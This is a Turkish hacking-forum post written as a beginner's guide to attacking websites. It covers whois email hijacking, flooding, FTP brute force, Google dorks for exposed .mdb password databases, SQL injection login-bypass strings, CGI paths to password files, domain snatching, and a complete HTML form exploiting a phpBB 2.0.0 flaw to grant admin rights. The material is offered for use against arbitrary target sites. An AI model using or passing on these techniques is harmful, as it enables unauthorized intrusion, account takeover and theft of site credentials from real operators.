domain hack

technocolix

Yeni üye
23 Eyl 2006
49
0
pc den
Domain Hacke Yeni Başlayanlar Icin
domain hack'e yeni baslayanlar icin gayet güzel anlasilabilir bir döküman .

ir hedef siteye saLdırı yöntemLeri..
Basitten zora doğru bir sıraLama yaptım..EkLemek istedikLeriniz warsa ekLeyiniz..

1.Whois

http://whois.webhosting.info/ ten whois çekiyoruzz..

Eğer mynet hotmail yaho faLansa hackLiyoruz.Eğer başKaysa onun fake kodunu hazırLıyoruzz.
HackLediğimiz maiLLe hosta gidip şifremizi istetiyoruz..

2.FLood

Denyo Launch War TooL gibi programLarLa fLood yaparak siteyi geçici oLarak erişimi yasakLayabiLiriz(Bandwith oLayı)
Ya da forumLarın anketLere fLood yaparak hata wermeLerini sağLayabiLirz.MeseLa mynetteki anketLere fLooD çekince sıfırLanıyor.
Tabi fLoodunda şekiLLeri war.BunLarı burada açıkLamak istemiyorumm.Ama en etkiLi fLood member regLemektir..AkLınızın bir köşesinde buLunsun..

3.Ftp brute Force..

Cracker Jack vcrack ftp gibi programLarLa ftp şifresini buLmak için brute force yapıLır..

İyi bir bağLantı we duruma göre kaLiteLi bir wordList gerektirebiLir..

Siz karşıdaki kşiye göre kendinizde hazırLayabiLirsinizz..

Bu programLarın kuLLanIMLarı forumLarımızda warr...

4.AçıkLar.

BeLkide üstünde sayfaLar yazıLabiLecekk böLüm..

Php asp sistemLerin birçok açığı warr.

ASP:

Çok kuLLanıLan webwiz we snitz forumLarı (binLerce)

HackLemek çok basit..

snitz forumLarı - snitz_forums_2000.mdb
Webwiz forumLarı - /admin/wwforum.mdb bu şekİlde main database e uLaşıp admin şifrelerini accessLe weya başka bir msb browserLa açarak buLabiLirsinizz..Sonra forum sizin emrinizde..

Asp nuke siteLerdede /db/main.mdb denersenizz db Dosyasını buLabiLirsiniz..

*Herhangi bir sitenin mdb si içinse O sitenin üyeLik sistemi portaLını buLarak bunLarı aspindir.com dan indirerek db yoLuna bakarsınızz..

BunLar

db/uyelik.mdb /db/members.mdb /db/sifreler.mdb oLabiLir..

Bu şekiLde googLedan aratak rastgeLe sitede hackLeyebiLirsinizz..

Bir mdb buLma yöntemi:
*Asp siteLerde üyeLik sistemLeri site yönetimi için portaLLar geneLLikLe geneL hazır scriptLerden yazıLmıştır...

.mdb hackLemek için herkez googLe dan inurl"x.mdb" oLarak aratır..

Şimdi benim diyeceği yöntem hiç bi yerde yoq we tamamen benim tarafımdan buyLunmuşturr.:)

www.aspindir.com
www.asparsivi.com
www.maxiasp.com siteLerinden hazır bir üyeLik sistemi indiriyoruzz..

MeseLa xp üyeLik sistemini indirin.
Db yoLuna bakın..

Bakıyoruzz..

/db/uyelik.mdb

Şimdi googLe! a girip Xp üyeLik sistemi diye aratınn..
Ewet "xp üyelik sistemi" şekLinde aratığınızda karşınıza onLarca sayfa çıkacaktır..

Bu iLk 4 sayfada 20 1ye yakın sitede bu açıkTan war.

Çıkan sonuçLarın db Lerini indirip accessLe açarsanızz şifreLer eLinizdee..
*SqL İnjection
user 'or' şifre: 'or' bu şekiLde admin girişi yapabiLirsiniz..

*Php

Php sistemLerinde açığı war..

Php-nuke 5.5 te haber ekLeme açığı weya kuLLanıcı adı:admin şifre:'or true'

GüwenLik açıkLarı böLümünden sql injection açığına bakarsanızz göreceksiniz..

Phpbb forumLarında açıkLarı wardır.MeseLa örnek oLaarak phbb2.0.0 açığı bu forumdan kaLmadı deniLebiLir ama örnek oLsun diye weriyorum.

Kod:
<form method="post" action="http://forum sayfası/admin/admin_ug_auth.php">

<p>User Level : <select name="userlevel">
<option value="admin" selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input type="hidden" name="private[1]" value="0" />
<input type="hidden" name="moderator[1]" value="0" />
<input type="hidden" name="mode" value="user" />
<input type="hidden" name="adv" value="" />
User ID: <input type="text" name="u" size="5"> <BR>
<input type="submit" name="submit" value="Submit" class="mainoption" />
<input type="reset" value="Reset" class="liteoption" name="reset" />

</form>
</body>
</html>


Bu KoD yeni bir üyeye admin yetkisi werir.

Birda phpbb forumLarın 2.0.3 de db.php açığını duydum..

BuLabiLirsem yayınLarım..

Birde bazı .php dosyalarını çaLarak admin şifreLerine uLaşabiLiyorduk.

Sanırım config.php diydi.
Bunu FLashget webzip tarzı programLarLa kendi pcmize yükLeyebiLiyoruz..

*php maiLList açığı

GoogLe dan aratıp vuLduunuz php maiLListLerin sonuna /ml_config.dat ekLeyerek admin şifresine uLaşabiLirsiniz..

*Cgi script açıkLarı..
WebBBS Scriptleri
----

WebBBS - Bulletin Board System (Bildiri Tahtası Sistemi) Bu sistem yukarıda size örneklediğim gibi siteye mesaj atmak için kullanılır.
Bu sistem bünyesinde bu bildiri tahtalarına üye kimselerin kullanıcı adı/şifre kombinasyonlarını bulundurur.Böylelikle istediğiniz kişi adına
bildiri tahtasına mesaj gönderebilirsiniz.

Açık :
http://www.hedefsite.com/cgi-bin/webBBS/profiles/ ya da http://www.hedefsite.com/cgi-bin/webBBS/users/

WebAdvert Scriptleri (RekLamLar..)


WebAdverts (WebReklam) Bu scriptler sayesinde site yöneticisi sitede aldığı reklamları yayınlar.Her reklam için ayrı hesap vardır.
Bu açığı kullanarak kendi hazırladığınız bannerları sitede yayınlayabilirsiniz.Ayrıca diğer reklam verenlerin hesaplarını silmek ya da bannerlarını
değiştirmek elinizde.

Açık :
http://www.hedefsite.com/cgi-bin/advert/adpassword.txt --> Şifrelerin bulunduğu .txt ..



WWWBoard Scriptleri


wEBBSS İLe aynı şekiLde..

Açık :
http://www.hedefsite.com/cgi-bin/wwwebboard.txt

Açık : http://www.hedefsite.com/cgi-bin/wwwboard.txt

Açık : http://www.hedefsite.com/webboard/password.txt

-------------------------
MaillistLer..
-------------------------

Açık :
http://www.hedefsite.com/cgi-bin/mailman/addresses.txt

Açık : http://www.hedefsite.com/cgi-bin/maillist/addresses.txt

Açık : http://www.hedefsite.com/cgi-bin/mail/addresses.txt

Açık : http://www.hedefsite.com/cgi-bin/maillist/users.txt

AçıkLARI BuLmak..

Scriptler hakkında geniş bilginiz yoksa ve yukarıda örneklediğim türden belirli başlı açıkları bilmiyorsanız Cgi Zayıflık Tarayıcılarını kullanmanızı öneririm.
Çeşitli tarayıcılar var bu alanda*bir kısmını deniyebilirsiniz.Önemli olan tarayıcının bünyesinde bulundurduğu açık sayısı.Bu çok önemlidir.Bir tarayıcı bünyesinde
ne kadar çok açık bulundurursa o kadar şansınız artar.Tarayıcınızın güncelleme seçeneği varsa sık sık yenilemenizi öneriririm.Güncelleme seçeneği yoksa birden fazla
tarayıcı kullanmalısınız.Unutmamanız gereken en önemli nokta ise her bulduğunuz scripti hackliyemeyeceğiniz.

Size daha pratik bir yol daha söyliyeyim*www.arabul.com - www.netbul.com gibi siteler kayıtlı olan web siteleri içerisinde her türlü kelimeyi arama özelliğine sahiptir.Bu
tip arama motorlarına ****crawler denir.Yabancı servis olarak size tavsiyem www.webcrawler.com ya da www.****crawler.com.

Örnek Aratabileceğiniz kelimeler;
cgi-bin
cgi-bin/örnek.pwd
cgi-bin/password.txt
cgi-bin/örnek.cfg


*ExpLoitLer

Ek*** oLduğum konu bu fazla biLgim yok buLabiLeceğiniz adresLer..

AdresLer:
www.k-otik.com/exploits

www.securityfocus.com gibi adreslerde buLabiLirsiniz..




5.ListPath

En sewdigiim hack yöntemLerinden biridir..

Bir php weya asp kodu çaLıştırarak o hostun tüm siteLere erişim hakkı sağLanır.ELmaLı şeker iLk çıktığında oLay yaratmıştı.

Fakat bu ListpathLeri nerden buLacağız??

Sitemizi inceLeyin we www.kullanilmasiyasaknick a da arada sırada bakınn..

Bu oLay free hostLarda çaLışmaz..Denemeyin yani..

HackLemeniz için bi hosttan yer kiraLamanız Lazım..

6.Domain reg..

Eğer hedef site mutLaka hackLenmek zorundaysa hostun bitiş tarihi yakınsa hemen bittği gün hostu domaini ederekte yapabiLirsinizz..Sonra istediiniz gibi index atın cc iLe yapabiLirsiniz bu oLayı..

Yine sitemizde dağıtıLıyor..

7.Birtakım bazı açıkLar..

Unicode commander.pL gibi eski fakat hakkını wermemiz gereknn açıkLar..

Unicode birçok devLet sitesinde duruyor haLa..

Commander.pL service.pwd cgi/bin açıkLarı bunLardan bahsetmiyorum..Zaten her yerde war ayrıca bu açıkLarı buLunduran pek site kaLmadı..
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.